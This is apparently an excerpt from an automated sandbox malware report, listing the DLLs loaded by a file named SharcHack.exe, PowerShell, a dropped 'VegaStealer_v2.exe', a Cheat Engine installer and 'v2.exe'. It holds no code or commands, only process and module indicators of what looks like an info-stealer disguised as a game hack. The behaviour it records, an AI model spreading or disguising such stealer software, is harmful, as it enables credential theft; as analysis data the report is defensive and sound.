Source: C:\Users\user\Desktop\SharcHack.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SharcHack.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\SharcHack.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SharcHack.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SharcHack.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SharcHack.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SharcHack.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SharcHack.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SharcHack.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SharcHack.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SharcHack.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SharcHack.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SharcHack.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SharcHack.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SharcHack.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SharcHack.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SharcHack.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SharcHack.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SharcHack.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SharcHack.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SharcHack.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SharcHack.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SharcHack.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CheatEngine75.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CheatEngine75.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CheatEngine75.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CheatEngine75.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CheatEngine75.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: msftedit.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: windows.globalization.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: bcp47mrm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: globinputhost.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: zipfldr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
